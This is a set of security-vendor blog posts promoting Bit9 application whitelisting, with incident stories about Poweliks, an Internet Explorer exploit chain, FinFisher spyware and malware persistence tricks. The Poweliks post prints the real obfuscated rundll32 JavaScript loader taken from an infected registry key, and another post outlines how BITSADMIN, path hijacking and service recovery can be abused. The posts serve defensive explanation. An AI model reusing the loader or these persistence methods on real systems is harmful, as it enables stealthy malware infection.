Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

This blog post I wrote for the Bit9 Blog and was published on January 21st, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) –Embedding

Once the above code executed, it would

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses, and then it would
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn’t have guessed that rundll32 would be able to execute Javascript code, but if you are curious to see for yourself, try executing the following:

rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;alert(‘RaawwwrrrrRRrrr’);


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:


The rule would then block PowerShell from executing, thereby preventing the computer from becoming completely infected. We then ran a report based on files being blocked by the rule to identify the infected users.

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.



Scan-based Forensics Solutions Are for Cavemen

This blog post I wrote for the Bit9 Blog and was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew there was something creating a task in:

c:\windows\system32\tasks, that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a dll file in c:\windows\system32. The dll files they encountered were named using five to six alpha characters. In one example, the ssaxxo.dll file dropped into the c:\windows\system32 directory.

The files seemed to have unique hashes, but they were all detected as known malware. When the dll file got dropped into the C:\windows\system32 directory, another file with a different name appears in the c:\windows\syswow64 folder as well. Both of the dll files appear to have been generated by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first dll file, create the scheduled task, and then pass the dll file to rundll32.exe. Rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which is blocked by Bit9. The scheduled task is set to keep trying every 10 minutes.

As we were going through this exercise, the customer wished they also were running Carbon Black.

That’s because he knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you and is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Cyberespionage Tackle Box: FinFisher Spyware Casts Wide Net

FinFisher’s Global Proliferation: Updated Map
Copyright, The Citizen Lab 2013

EDIT: New information about FinFisher was released by F-Secure on August 30, 2013.

Originally posted on the Bit9 Corporate Blog.

As I reviewed recent headlines, I took note of a company out of the U.K., Gamma International, that makes purpose-built spying tools. Their software offering is called FinFisher (aka FinSpy). The buzz phrase they use is “lawful intercept,” which means that its use should be bound by laws that allow spying in certain circumstances. Personally, I file it under “greyware,” considering it could be used legally or illegally to remotely control or embed cyberespionage tools within benign looking software. So how do organizations secure themselves against these kinds of tools?

Last year Morgan Marquis-Boire, a security researcher at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs, and Bill Marczak, a computer science doctoral student at the University of California, Berkeley, found emails containing surveillance tools traced back to Gamma International. More recently, those researchers found the command-and-control server for FinFisher running in 36 countries. According to Mikko Hypponen of F-Secure, Gamma International even tried to sell FinFisher to the Egyptian Government under former President Mubarak.

As the New York Times reported in March:

Martin J. Muench, a Gamma Group managing director, has said his company does not disclose its customers but that Gamma Group sold its technology to governments only to monitor criminals. He said that it was most frequently used “against pedophiles, terrorists, organized crime, kidnapping and human trafficking.”

But evidence suggests the software is being sold to governments where the potential for abuse is high. “If you look at the list of countries that Gamma is selling to, many do not have a robust rule of law,” Mr. Marquis-Boire said. “Rather than catching kidnappers and drug dealers, it looks more likely that it is being used for politically motivated surveillance.”

FinSpy vs. Mozilla Firefox.

The Citizen Lab released research on the topic a few days ago titled “For Their Eyes Only: The Commercialization of Digital Spying.” The data in this report is shocking in many ways, including a mobile version of FinSpy that follows the same path as its desktop equivalent.

They also have a sample package that realistically masquerades as Mozilla’s Firefox. They copied so many details that Mozilla sent Gamma International a cease-and-desist letter, according to Wired. As you see in the screenshot below, the properties of the executable are identical. How would one ever know the difference? You could rely on virus scanners, but without a sample of the malicious code they won’t be able to detect or stop it.

The tried-and-true security tools that most of us depend on are reactive. You have to wait on security researchers to tear apart samples that they find in the wild to give you reactive protection. It’s the same old cat-and-mouse game that leaves you open to attack.

Fortunately, there is a way to end the game. The Bit9 Trust-based Security Platform takes a different approach by blocking the execution of untrusted files across endpoints and servers. Let’s look through the Citizen Lab’s research paper and see how Bit9 would stop these threats.

  • In the messages sent to Bahrain dissidents, used the “right-to-left override” attack. From the research paper: “The RLO character (U+202e in unicode) controls the positioning of characters in text containing characters flowing from right to left, such as Arabic or Hebrew. The malware appears on a victim’s desktop as ‘exe.Rajab1.jpg’ (for example), along with the default Windows icon for a picture file without thumbnail. But, when the UTF-8 based filename is displayed in ANSI, the name is displayed as ‘gpj.1bajaR.exe.’ Believing that they are opening a harmless ‘.jpg,’ victims are instead tricked into running an executable ‘.exe’ file.”
    • If Bit9 were installed and running in high-enforcement mode, the unknown or untrusted executable would not have executed. Even if you were running Bit9 in block-and-ask mode, the user would be alerted that a program was trying to run something other than a .jpg.
  • In emails sent to the Moroccan citizen media and journalism project Mamfakinch, the payload was in a malicious java file, “adobe.jar.” This file then facilitated the installation of a multi-platform (OSX and Windows) backdoor. On Windows, it writes a number of files, including ZsROY7X.-MP. This file appears to provide the main backdoor functionality. It adds a registry key to ensure the Trojan stays persistent and runs via rundll32.
    • Bit9 has the ability to track and block Java files as it does other executables, but it isn’t turned on by default. So if you had that Java option enabled, Bit9 would keep “adobe.jar” from ever executing. Let’s say you don’t have Java tracking enabled. In that case, “adobe.jar” would execute, writing out the files to the endpoint. Bit9 examines each file for its contents, finding the file “ZsROY7X.-MP” to be executable as DLL. When rundll32.exe is called to load it that execution will be blocked. The Trojan will never be able to execute with Bit9 installed.
  • In an email sent to Ahmed Mansoor, a prominent UAE blogger who was imprisoned, the payload is a malicious document that looks like a Microsoft Word file, but is an RTF file that exploits a stack-based buffer overflow in the RTF format and downloads additional payloads. Using a Windows API, it downloads a second file, which is also a downloader. Then the third stage is where the backdoor is downloaded, “verimportant.doc3.” The file then writes out several files, including “V46lMhsH.shv,” which is run via “rundll32.exe.”
    • This use case has a different point of injection, but the same outcome. In this case, either the second downloader or the backdoor itself would be blocked by Bit9. Since the backdoor wouldn’t execute, cleanup would be relatively easy since it wasn’t able to inject itself into other software.
  • In the use case of the modified version of Firefox, the user would be tricked into installing the wrong version by DNS poisoning, link-jacking, cross-site scripting, clever emails, or other means. The user would then install what looks to be a normally functioning version of Firefox. Infecting an endpoint in this manner tricks the users into accepting changes to his or her system. They know they are installing software, so they are more likely to click “yes” to any security warnings.
    • Companies using Bit9 build a trust-based security approach that ensures any software delivered and executed on an endpoint has been approved in some trusted fashion. Whatever model is deployed, it can prevent “trick the end user” attacks because the malicious version of Firefox is not signed by Mozilla. It would not be able to pass the rigors of a trust-based approach and would not be allowed to execute on the endpoint.

Malware comes in various shapes and sizes, with some written by criminals and others written by private companies. Keeping up with these advanced threats requires a new approach to security. Bit9 ensures that only trusted software can run, as opposed to relying on deep analysis of already-known threats that can take time and money to defend against while still leaving you unsecure. A trust-based approach is the most secure method to ensure your endpoints and servers are not being spied on by foreign governments using products such as FinFisher and FinSpy.

Bit9 2013 Server Security Survey

Bit9 2013 Server Security Survey Shows Concerns
about Targeted Malware Rising

1,000 IT and Security Pros Worldwide are Less Confident about Stopping Threats

WALTHAM, Mass.—March 21, 2013—Bit9, the leader in Trust-based Security, today announced the results of its second annual server security survey of nearly 1,000 IT and security professionals worldwide. Key findings include:

  1. 52 percent of respondents said targeted malware attacks are their top server security concern, up 15 percent from the prior year.
  2. 25 percent of respondents said their servers were attacked in 2012, up 8 percent.
  3. 12 percent of the survey group ranked “too much administrative effort” required by traditional security solution as a bigger concern than actual attacks. 43 percent of respondents use more than 1 full-time employee to manage server security.

Click here to download the Bit9 2013 Server Security Survey report and the infographic The Truth about Server Security.

“These results highlight the need for greater control in identifying and stopping advanced attacks on valuable server resources—before they execute—while decreasing the security-related administrative workloads of IT and security professionals,” said Brian Hazzard, vice president of product management for Bit9. “The key to securing enterprise servers—both physical and virtual—is to allow only trusted software to execute and prevent all other files from running. That’s how the Bit9 Platform protects our customers’ servers and endpoints against targeted attacks, zero-day threats and all other types of malware.”

Wipe the Drive! or use Bit9

I just read a great article by Mark Baggett (@MarkBaggett) on the ISC Diary called Wipe the drive! Stealthy Malware Persistence Mechanism – Part 1 and Wipe the drive! Stealthy Malware Persistence – Part 2.  This was from his presentation at Shmoocom 2013.  He shows 4 different methods how malware can stick around even after it’s been “cleaned” by anti-malware products.  I completely agree with his advice: always “Wipe the Drive”.  It’s the only sure fire way to clean the system, but what if you can’t for some reason?  Maybe it’s a traveling employee or an executive at a conference.  Wiping and re-imaging is a costly procedure in most enterprises.

What if you had Bit9 installed?  How would these 4 situations play out?  Let’s go through them.  Bit 9 can be run in three protection modes: Monitor-only with Advanced Treat Indicators (ATIs), Block & Ask, and Block.  If you are running endpoints in Monitor-only mode with ATIs, you would get an alert on your Bit9 console for these actions.   This alert could be acted upon within Bit9 or from your SIEM.  For the other two modes, I’ll explain how each of these would be blocked, since that’s how most of our customers use Bit9.

TECHNIQUE  #1  – File Associations Hijacking

What happens when you click on a .TXT file?   The operating system checks the HKEY_CLASSES_ROOT hive for the associated extension to see what program it should launch.  …

What if the attacker or his malware changes this association?   Instead of launching notepad it tells the OS to launch NOTPAD.EXE.     NOTPAD.EXE is wrapper around the real NOTEPAD.EXE but it also contains a malicious payload.

This is pretty straightforward.  NOTPAD.EXE would be blocked because it isn’t trusted.  No matter how you tricked the user into running it, Bit9 is protecting you.  When you get the block alert, it’s time to wipe the drive, but only when get around to it… after all, you are protected by Bit9.


BITS is the Background Intelligent Transfer System.  This service is used by your operating system to download patches from Microsoft or your local WSUS server.   But this service can also be used to schedule the download of an attacker’s malware to reinfect your system.   Once the attacker or his malware are on on your machine he execute BITSADMIN to schedule the download of   He schedules the job to only retry the URL once a day and automatically execute the program after it is successfully downloaded.  The attacker doesn’t put anything at that URL today.   Instead, he simply waits for you to finish your incident handling process and look the other way.   You can scan the machine with 100 different virus scanners.   Today there is no file on your system to detect.  You can do memory forensics all day.   Sorry, there is nothing running today.    Today it is just a simple configuration change to the OS.    Then when he is ready he places malware.exe on his site.   Your machine dutifully downloads the new malware and executes it.

Again, this is a very easy use case.  malware.exe wouldn’t be allowed to run.  When you get the block alert, it’s time to wipe the drive, but only when get around to it.  Bit9’s got you covered until then.

TECHNIQUE  #3  – Program.exe

When Jake and I were preparing for the Shmoocon talk that we gave on this subject, I suggested we include this technique in our presentation.    Jake disagreed because this thing has been around since the year 2000 and I quickly relented and agreed with him.  At the time we both thought that this technique is pretty lame and we shouldn’t have to worry about a THIRTEEN YEAR OLD vulnerability.   Instead I decided to do a post on the ISC to talk about the technique and see what response we got.    The response for you, our awesome supporters, was incredible.    ISC readers documented several dozen of these attacks in critical systems common to most corporate desktop images.    You made Jake a believer (he had a vulnerable OEM application you found on his laptop). The response was such that I am now convinced that an attacker can use this technique and have a great deal of confidence that his malware will be launched.   As a matter of fact, it will probably be launched by something that has system permissions.    I won’t repeat the full details of the technique here since I already covered it on the ISC.   You can check out this article if you missed it:

This is the scenario. Malware or an attacker is on your machine.   He has administrative or Power User access.   The attacker drops a file called “program.exe” on the root of your C drive.    “program.exe” is a small application that reads the command line parameters that were used to call it.  It launches the real program you had intended to call and then executes its malicious payload.   Simple but effective.

This one is interesting.  When you install the Bit9 agent, it locally approves all files on the system.  Then you setup a chain of trust.  If you have program.exe on old machines or existing gold images, Bit9 will trust it.

I would advise following the link above and understanding this issue.  It’s worth it to review gold images a bit closer when putting them in your trust based architecture in Bit9.  When doing this review, it’s a great use case for using cloud based reputation using Bit9’s Software Reputation Service (SRS).  If you have any questionable files on your image, run them through SRS.  Find out what the world thinks about them.  Another bit of advice for vetting gold images: review unsigned code!  You can even detonate files in a FireEye MAS, if you have one.

If you do find any malware like this program.exe, globally ban it in Bit9 (and delete it from your gold image)!  This will instantly protect all existing computers running the Bit9 agent.  Global Bans even work on Bit9 agents running in Monitor-only mode.  No need to wipe every drive immediately when you are protected with Bit9.

Technique #4 –  Service Failure Recovery Startups

You can configure Windows services with an automatic recovery action.  The defined action will be taken when the service crashes unexpectedly.    You can see these on the recovery tab for a service using services.msc.   Here you see this service first tries to restart the service, then it will …. ummm… whats that??  ..  RUN A PROGRAM.   Hmm.

This use case is also straightforward.  The malware has tricked the user, even tricked the system, but it hasn’t been tricked by Bit9.  Blocked, again.

I hope this helps shine the light on the amazing power of software whitelisting.  It changes the game in end-point protection.  You don’t have to go running after every trick in the book that may trick a user. You only have vet the software you trust, and you don’t have to wipe the drive immediately when an infection occurs.  Bit9 gives you the freedom to have endpoint protected while you wipe the drive at your convenience.

Learn about the new Bit9 Advanced Threat Detection


Hear Michael Bilancieri telling the compelling story about our new detection and forensics capabilities and innovative new Advanced Threat Indicators.

Bit9’s Trust-based Security Platform combines real-time sensors, Advanced Threat Indicators (ATI), and the cloud-based Bit9 Software Reputation Service to immediately detect advanced threats and malware. You won’t wait for signature file updates. No testing or updating .dat files. Bit9 specializes in advanced threat detection.

Moving On and adding some Bits

As of February 1st, I will be leaving IBM.   It’s been a great 7 years.   I never thought I could enjoy working for a large company, or working so long in the same position.   Man was I wrong.   IBM really has some great people, and I had the best quality of life during my tenure.   Even though I was in the same position, life was rarely dull with constant acquisitions (nearly one per year that affected me!).   I started off working with NeuSecure/TSOM, then TDI, then TCIM, then TSIEM, then AppScan, then Proventia and SiteProtector, then BigFix/TEM, and finally QRadar.   That’s a busy seven years!

Well, what’s next?  I have accepted a position at Bit9 as a client partner. I am excited about this on several fronts.   One, I think the technology is amazing.   I’ve never been a big supporter of virus scan products.   They just never seem to offer adequate protection.   Bit9′s approach is to whitelist the good stuff as opposed to trying to find all the bad stuff.   I really think this is a better way to secure endpoints.   I’ll be posting more on my security philosophy soon.

Secondly, I’m excited to be moving to a small company.   Not only is moving to a start-up* exciting, the people there are too.   Everyone I’ve talked to so far seems to be on the same page as me when it comes to security philosophy, business philosophy, and look to be very fun to work with.   I was lucky to find a good crew at IBM, and it looks like my luck continues at Bit9.

Also the client partner role looks to be very fulfilling.   When I look back on my time at IBM, I really enjoyed the time that I could form long-term relationships with my customers.   That’s also where I found the greatest success.   This position looks to mix engagement management, relationship management, and technical account management. I’m also planning on doing some evangelist work too.

I am so excited to get started at Bit9 in February.   I will have to spend some time deprogramming myself as an IBMer, but I think this is a good move with a good company with a great product.

* Bit9′s been around for about 7 years and can hardly be called a start-up anymore.   But every company seems like start-up when coming from IBM.